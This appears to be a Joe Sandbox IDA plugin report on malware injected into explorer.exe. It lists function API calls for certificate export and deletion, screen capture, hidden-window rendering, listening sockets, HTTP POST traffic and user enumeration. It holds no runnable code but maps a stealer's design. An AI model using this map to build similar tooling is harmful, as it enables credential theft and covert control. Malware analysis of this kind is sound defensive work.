Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Non-executed Functions

Function 01B6D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,01B54BBC,?,00000000,00000001), ref: 01B6D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 01B6D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 01B6D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01B6D508

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01B6D538
CharLowerW.USER32 ref: 01B6D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 01B6D561

Part of subcall function 01B6D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,01B6D581,?,?,00000000), ref: 01B6D43F

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

CertCloseStore.CRYPT32(?,00000000), ref: 01B6D5EA

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,01B54BBC,?,00000001,01B62C2A), ref: 01B6D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,01B62C2A), ref: 01B6D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,01B62C2A), ref: 01B6D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,01B62C2A), ref: 01B6D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,01B62C2A), ref: 01B6D63E

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B664FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 01B66506
bind.WS2_32(00000000,?,-0000001D), ref: 01B66526
listen.WS2_32(00000000,?), ref: 01B66535
#3.WS2_32(00000000), ref: 01B66540

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B667DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 01B667E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 01B66804
#3.WS2_32(00000000), ref: 01B6680F

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 01B5EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 01B5EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 01B5EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 01B5EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 01B5EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 01B5EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 01B5EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 01B5EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 01B5EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 01B5EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 01B5EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 01B5EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 01B5EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 01B5EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 01B5EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 01B5EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 01B5EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 01B5EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 01B5EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 01B5EC10
GetIconInfo.USER32(00000000,?), ref: 01B5EC25
GetCursorPos.USER32(?), ref: 01B5EC33
DrawIcon.USER32(?,?,?,?), ref: 01B5ED04

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 01B5ED85

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

FreeLibrary.KERNEL32(00000000), ref: 01B5EE9C
FreeLibrary.KERNEL32(?), ref: 01B5EEA6
FreeLibrary.KERNEL32(00000000), ref: 01B5EEB0

Strings

GdipSaveImageToStream, xrefs: 01B5EA97
CreateStreamOnHGlobal, xrefs: 01B5EAEC
gdi32.dll, xrefs: 01B5EB02
GdipCreateBitmapFromHBITMAP, xrefs: 01B5EA63
CreateCompatibleBitmap, xrefs: 01B5EB20
DISPLAY, xrefs: 01B5EBDE
DeleteDC, xrefs: 01B5EB61
DeleteObject, xrefs: 01B5EB54
CreateCompatibleDC, xrefs: 01B5EB14
GdipGetImageEncoders, xrefs: 01B5EA8A
ole32.dll, xrefs: 01B5EAE5
GdipDisposeImage, xrefs: 01B5EA70
GdipGetImageEncodersSize, xrefs: 01B5EA7D
gdiplus.dll, xrefs: 01B5EA25
BitBlt, xrefs: 01B5EB47
GdiplusStartup, xrefs: 01B5EA4B
CreateDCW, xrefs: 01B5EB09
SelectObject, xrefs: 01B5EB3A
GetDeviceCaps, xrefs: 01B5EB2D
GdiplusShutdown, xrefs: 01B5EA56

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B554A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 01B5DCA2: GetClassNameW.USER32(01B801CA,?,00000101), ref: 01B5DCBD

GetWindowInfo.USER32(?,?), ref: 01B55515
IntersectRect.USER32(?,?,-00000114), ref: 01B55538
IntersectRect.USER32(?,?,-00000114), ref: 01B5558E
GetDC.USER32(00000000), ref: 01B555D2
CreateCompatibleDC.GDI32(00000000), ref: 01B555E3
ReleaseDC.USER32(00000000,00000000), ref: 01B555ED
SelectObject.GDI32(00000000,?), ref: 01B55602
DeleteDC.GDI32(00000000), ref: 01B55610
TlsSetValue.KERNEL32(?), ref: 01B5565B
EqualRect.USER32(?,?), ref: 01B55675
SaveDC.GDI32(00000000), ref: 01B55680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B5569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 01B556BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 01B556CD
RestoreDC.GDI32(00000000,?), ref: 01B556E4
SaveDC.GDI32(00000000), ref: 01B55706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01B5571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01B55735
RestoreDC.GDI32(00000000,?), ref: 01B55743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01B55756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01B55766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01B55778
TlsSetValue.KERNEL32(00000000), ref: 01B55792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B557B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 01B557CE
SelectObject.GDI32(00000000,?), ref: 01B557E4
DeleteDC.GDI32(00000000), ref: 01B557EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B55813

Part of subcall function 01B553C7: GdiFlush.GDI32 ref: 01B5541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 01B55829

Strings

<, xrefs: 01B5550B

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B62D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 01B685D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 01B685F5
Part of subcall function 01B685D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68608
Part of subcall function 01B685D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68630
Part of subcall function 01B685D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01B68648
Part of subcall function 01B685D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68662
Part of subcall function 01B685D0: CloseHandle.KERNEL32(?), ref: 01B6866B

Part of subcall function 01B68678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,01B6C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 01B68689
Part of subcall function 01B68678: CloseHandle.KERNEL32(?), ref: 01B68697

CreateMutexW.KERNEL32(01B72C30,00000001,?,32901130,?,00000001,?), ref: 01B62D91
GetLastError.KERNEL32 ref: 01B62DA3
CloseHandle.KERNEL32(000001E6), ref: 01B62DBA

Part of subcall function 01B5E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01B5E8E0

Part of subcall function 01B631CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01B631ED
Part of subcall function 01B631CC: Process32FirstW.KERNEL32(000001E6,?), ref: 01B63216
Part of subcall function 01B631CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 01B63271
Part of subcall function 01B631CC: CloseHandle.KERNEL32(00000000), ref: 01B6328E
Part of subcall function 01B631CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 01B632A1
Part of subcall function 01B631CC: CloseHandle.KERNEL32(?), ref: 01B6330E
Part of subcall function 01B631CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 01B6331A
Part of subcall function 01B631CC: CloseHandle.KERNEL32(000001E6), ref: 01B6332B

ExitWindowsEx.USER32(00000014,80000000), ref: 01B62DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 01B62E1C
SetEvent.KERNEL32(00000000), ref: 01B62E29
CloseHandle.KERNEL32(00000000), ref: 01B62E30

Part of subcall function 01B62A32: CloseHandle.KERNEL32(01B72AF0), ref: 01B62AF2

CloseHandle.KERNEL32(000001E6), ref: 01B62E42
ReadProcessMemory.KERNEL32(000000FF,01B80014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 01B62EA6
Sleep.KERNEL32(000001F4), ref: 01B62EB8
IsWellKnownSid.ADVAPI32(08A4F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 01B62EC9
ReadProcessMemory.KERNEL32(000000FF,01B80014,00000000,00000001,00000000), ref: 01B62EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 01B62F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 01B62F50

Part of subcall function 01B697D0: VirtualProtect.KERNEL32(01B6CA1A,?,00000040,00000000,01B80014,?,?,01B62F6C,?,?), ref: 01B697E5
Part of subcall function 01B697D0: VirtualProtect.KERNEL32(01B6CA1A,?,00000000,00000000,?,?,01B62F6C,?,?), ref: 01B69818

CreateEventW.KERNEL32(01B72C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 01B62FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B62FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01B62FF7
CloseHandle.KERNEL32(0000000C), ref: 01B6300D
CloseHandle.KERNEL32(?), ref: 01B63013
CloseHandle.KERNEL32(?), ref: 01B63016

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Part of subcall function 01B6D0E6: LoadLibraryW.KERNEL32(?), ref: 01B6D107
Part of subcall function 01B6D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 01B6D128
Part of subcall function 01B6D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 01B6D159
Part of subcall function 01B6D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 01B6D17C
Part of subcall function 01B6D0E6: FreeLibrary.KERNEL32(00000000), ref: 01B6D1A3
Part of subcall function 01B6D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 01B6D1D9
Part of subcall function 01B6D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 01B6D212
Part of subcall function 01B6D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 01B6D2AB
Part of subcall function 01B6D0E6: NetApiBufferFree.NETAPI32(?), ref: 01B6D2BE
Part of subcall function 01B6D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 01B6D2E2

Part of subcall function 01B64E20: CharToOemW.USER32(?,?), ref: 01B64E35

Part of subcall function 01B66B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,01B62E87,?,19367401,?,00000001,8889347B,00000002), ref: 01B66BA9
Part of subcall function 01B66B9E: CloseHandle.KERNEL32(00000000), ref: 01B66BB4

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B6CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,08A4F800,00000000), ref: 01B6CD57
Part of subcall function 01B6CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 01B6CD6F

Strings

{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 01B62F08
C:\Users\admin\AppData\Roaming, xrefs: 01B62F35, 01B62F6C, 01B62F94
, xrefs: 01B62DD7

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5DD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(01B72868,00000000,0000018C,00000000,00000000), ref: 01B5DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 01B5DD4A
CreateEventW.KERNEL32(01B72C30,00000001,00000000,?,84889912,?,00000001), ref: 01B5DD74
CreateMutexW.KERNEL32(01B72C30,00000000,?,18782822,?,00000001), ref: 01B5DD97
CreateFileMappingW.KERNEL32(00000000,01B72C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 01B5DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 01B5DDD8
GetDC.USER32(00000000), ref: 01B5DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 01B5DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 01B5DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 01B5DE32

Part of subcall function 01B69959: GetDIBits.GDI32(00000000,01B5DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01B69991
Part of subcall function 01B69959: GetDIBits.GDI32(00000000,01B5DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01B699A7
Part of subcall function 01B69959: DeleteObject.GDI32(01B5DE4B), ref: 01B699B4
Part of subcall function 01B69959: CreateDIBSection.GDI32(00000000,00000000,00000000,01B72888,?,?), ref: 01B69A24
Part of subcall function 01B69959: DeleteObject.GDI32(01B5DE4B), ref: 01B69A43

ReleaseDC.USER32(00000000,?), ref: 01B5DE56

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

CreateMutexW.KERNEL32(01B72C30,00000000,?,1898B122,?,00000001,01B728B8,?,00000102,01B728A4,01B72E70,00000010,?,?), ref: 01B5DF00
GetDC.USER32(00000000), ref: 01B5DF15
CreateCompatibleDC.GDI32(00000000), ref: 01B5DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 01B5DF3A
SelectObject.GDI32(00000000,00000000), ref: 01B5DF4D
ReleaseDC.USER32(00000000,00000001), ref: 01B5DF65

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B61A04, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182

APIs

Part of subcall function 01B67E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 01B67E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 01B61A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01B61A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 01B61AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 01B61AFD

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 01B61B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 01B61B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 01B61BC0

Part of subcall function 01B654F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01B65505
Part of subcall function 01B654F1: GetLastError.KERNEL32 ref: 01B6550F
Part of subcall function 01B654F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01B6552F

InternetCloseHandle.WININET(00000000), ref: 01B61C05
InternetCloseHandle.WININET(?), ref: 01B61C0F
InternetCloseHandle.WININET(?), ref: 01B61C19

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

GET, xrefs: 01B61A76, 01B61AA1
HTTP/1.1, xrefs: 01B61A98
POST, xrefs: 01B61A6F

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 01B5E26A
GetMenuItemCount.USER32(00000000), ref: 01B5E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 01B5E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 01B5E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 01B5E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 01B5E2E2
EndMenu.USER32 ref: 01B5E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 01B5E302
GetSubMenu.USER32(00000000,00000000), ref: 01B5E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 01B5E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 01B5E361
GetMenuItemID.USER32(00000000,00000000), ref: 01B5E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 01B5E392

Part of subcall function 01B554A9: GetWindowInfo.USER32(?,?), ref: 01B55515
Part of subcall function 01B554A9: IntersectRect.USER32(?,?,-00000114), ref: 01B55538
Part of subcall function 01B554A9: IntersectRect.USER32(?,?,-00000114), ref: 01B5558E
Part of subcall function 01B554A9: GetDC.USER32(00000000), ref: 01B555D2
Part of subcall function 01B554A9: CreateCompatibleDC.GDI32(00000000), ref: 01B555E3
Part of subcall function 01B554A9: ReleaseDC.USER32(00000000,00000000), ref: 01B555ED
Part of subcall function 01B554A9: SelectObject.GDI32(00000000,?), ref: 01B55602
Part of subcall function 01B554A9: DeleteDC.GDI32(00000000), ref: 01B55610
Part of subcall function 01B554A9: TlsSetValue.KERNEL32(?), ref: 01B5565B
Part of subcall function 01B554A9: EqualRect.USER32(?,?), ref: 01B55675
Part of subcall function 01B554A9: SaveDC.GDI32(00000000), ref: 01B55680
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B5569B
Part of subcall function 01B554A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 01B556BB
Part of subcall function 01B554A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 01B556CD
Part of subcall function 01B554A9: RestoreDC.GDI32(00000000,?), ref: 01B556E4
Part of subcall function 01B554A9: SaveDC.GDI32(00000000), ref: 01B55706
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01B5571C
Part of subcall function 01B554A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01B55735
Part of subcall function 01B554A9: RestoreDC.GDI32(00000000,?), ref: 01B55743
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01B55756
Part of subcall function 01B554A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01B55766
Part of subcall function 01B554A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01B55778
Part of subcall function 01B554A9: TlsSetValue.KERNEL32(00000000), ref: 01B55792
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B557B2
Part of subcall function 01B554A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 01B557CE
Part of subcall function 01B554A9: SelectObject.GDI32(00000000,?), ref: 01B557E4
Part of subcall function 01B554A9: DeleteDC.GDI32(00000000), ref: 01B557EB
Part of subcall function 01B554A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01B55813
Part of subcall function 01B554A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 01B55829

SetKeyboardState.USER32 ref: 01B5E3D1
SetEvent.KERNEL32 ref: 01B5E3DD

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B670A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 01B670B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,01B673A4,?,?,00000000,?), ref: 01B670D5
GetProcAddress.KERNEL32(FCIAddFile,?,01B673A4,?,?,00000000,?), ref: 01B670E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,01B673A4,?,?,00000000,?), ref: 01B670F9
GetProcAddress.KERNEL32(FCIDestroy,?,01B673A4,?,?,00000000,?), ref: 01B6710B
HeapCreate.KERNEL32(00000000,00080000,00000000,01B673A4,?,?,00000000,?), ref: 01B67136
FreeLibrary.KERNEL32(01B673A4,?,?,00000000,?), ref: 01B6714B

Strings

FCIFlushCabinet, xrefs: 01B670E9
FCIAddFile, xrefs: 01B670D7
FCICreate, xrefs: 01B670CF
FCIDestroy, xrefs: 01B670FB
cabinet.dll, xrefs: 01B670B0

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B550A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(01B723AC,0000FDE9,?), ref: 01B5515C

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

LeaveCriticalSection.KERNEL32(01B723AC,?,000000FF), ref: 01B551B7
EnterCriticalSection.KERNEL32(01B723AC), ref: 01B551D2
getpeername.WS2_32 ref: 01B5527F

Part of subcall function 01B6681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 01B66840

Strings

OMAV, xrefs: 01B55232
YIST, xrefs: 01B5523A
EASV, xrefs: 01B55250
\[EP, xrefs: 01B550E8
]QPG, xrefs: 01B5522A
YISQ, xrefs: 01B550EF
Z\AV, xrefs: 01B55248

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 01B6D107
GetProcAddress.KERNEL32(00000000,?), ref: 01B6D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 01B6D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 01B6D17C
FreeLibrary.KERNEL32(00000000), ref: 01B6D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 01B6D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 01B6D212

Part of subcall function 01B57125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 01B57138
Part of subcall function 01B57125: PathUnquoteSpacesW.SHLWAPI(?), ref: 01B571A0
Part of subcall function 01B57125: ExpandEnvironmentStringsW.KERNEL32(?,01B6D23A,00000104), ref: 01B571AD
Part of subcall function 01B57125: LocalFree.KERNEL32(?,.exe,00000000), ref: 01B571C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 01B6D2AB

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

Part of subcall function 01B689C2: PathSkipRootW.SHLWAPI(?), ref: 01B689CD
Part of subcall function 01B689C2: GetFileAttributesW.KERNEL32(?,?,00000000,01B6D261,?,?,?,?,?), ref: 01B689F5
Part of subcall function 01B689C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,01B6D261,?,?,?,?,?), ref: 01B68A03

Part of subcall function 01B6C912: LoadLibraryW.KERNEL32(?), ref: 01B6C929
Part of subcall function 01B6C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8), ref: 01B6C955
Part of subcall function 01B6C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?), ref: 01B6C96C
Part of subcall function 01B6C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?), ref: 01B6C984
Part of subcall function 01B6C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?,00000000), ref: 01B6C9A1
Part of subcall function 01B6C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?,00000000), ref: 01B6CA0D

NetApiBufferFree.NETAPI32(?), ref: 01B6D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 01B6D2E2

Part of subcall function 01B6786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 01B678AC
Part of subcall function 01B6786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 01B678B9

Strings

.exe, xrefs: 01B6D1BB, 01B6D267, 01B6D2EE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6C095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

EnterCriticalSection.KERNEL32(01B73FE4), ref: 01B6C0BC
LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C11A

Part of subcall function 01B61049: EnterCriticalSection.KERNEL32(01B72AC8), ref: 01B61064
Part of subcall function 01B61049: LeaveCriticalSection.KERNEL32(01B72AC8), ref: 01B610E7
Part of subcall function 01B61049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 01B611B2
Part of subcall function 01B61049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 01B613EC

LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C161

